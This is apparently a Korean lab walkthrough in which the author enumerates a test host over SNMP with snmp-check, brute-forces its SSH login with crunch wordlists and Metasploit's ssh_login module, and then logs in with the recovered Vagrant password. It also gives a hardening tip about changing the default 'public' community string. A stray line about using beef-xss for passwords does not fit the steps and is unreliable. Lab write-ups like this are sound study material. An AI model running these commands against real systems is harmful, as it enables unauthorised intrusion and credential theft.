SNMP 취약점을 통한 공격

Snmp는 Tcp/ip 네트워크 상에서 각 호스트에서 각 장비의 규격에 따라 정기적으로 여러 정보를 자동수집하여 네트워크 관리를 하는 역할을 한다. 그렇기 때문에 다양하고 많은 정보를 가지고 있게 된다.

Snmp-check 1.0.0.100(공격대상)을 통해 정보 확인을 해보겠다.

(보안 커뮤니티가 public일 경우 바로 정보가 드러난다.)

계정정보, 네트워크 정보, 라우팅 정보, 포트 정보가 다나온다.

보안상 좋지 않기 때문에 services.msc에서 snmp service을 들어간다.

속성에서 보안에서 public이 아닌 임의의 값으로 바꿔주는 것이 보안에 좋다.

Public -> pub으로 바꿔 주겠다.

그렇게 되면 pub을 알지 못해 접속하지 못한다. 만약 커뮤니티를 public이 아닌데 알고 있다면 어떻게 접속해야 할까?

SNMP -check 1.0.0.100 -c pub으로 설정해주면 무사히 접속이 된다.

SNMP –check를 통해 사용자의 계정을 알게 되는데 사용자 계정의 password를 알고 싶으면 어떻게 해야 할까? 프로그램에서 beef-xss을 클릭!

Crunch를 통해 비밀번호의 경우의 수를 만들 수 있다.

crunch <min> <max> <options>

ex) crunch 1 4 0123456789(1~4글자 수를 가지고 숫자인 수)

모든 경우의 수는 crunch 1 8 -f /usr/share/rainbowcrack/charset.txt ascii-32-95을 사용!

어마어마하게 많은 경우의 수들이 나온다. (시간 오래걸림!)

그래서 임의로 pass.txt로 vagrant의 ip의 암호가 들어있는 것을 만들었다.

Vi pass.txt를 통해 입력! (vagrant의 암호가 vagrant인 것을 알고 대입하였다.)

-> 암호매칭 시킬 떄 맞아야 하기 떄문에

Msfconsole 입력

Serarch ssh 입력 후 18번 사용!(login)

set rhosts 1.0.0.100 (공격대상 입력)

Userfile과 passfile 세팅
set pass_file pass.txt(아까 임의로 만든 파일)

Set user_file user.txt

Run 입력하면 vagrant의 암호가 무사히 나옴을 알 수 있다.

계정과 비밀번호를 알아 냈으니 ssh접속을 하겠다.

Ssh vagrant@1.0.0.100 (1.0.0.100에 vagrant계정으로 ssh를 실행하겠다.)

Password를 알기 떄문에 입력하여 준다.

무사히 접속이 된다. (shell이 나옴)

Cd ..도 되기 떄문에 여러가지 정보들을 확인할 수 있다.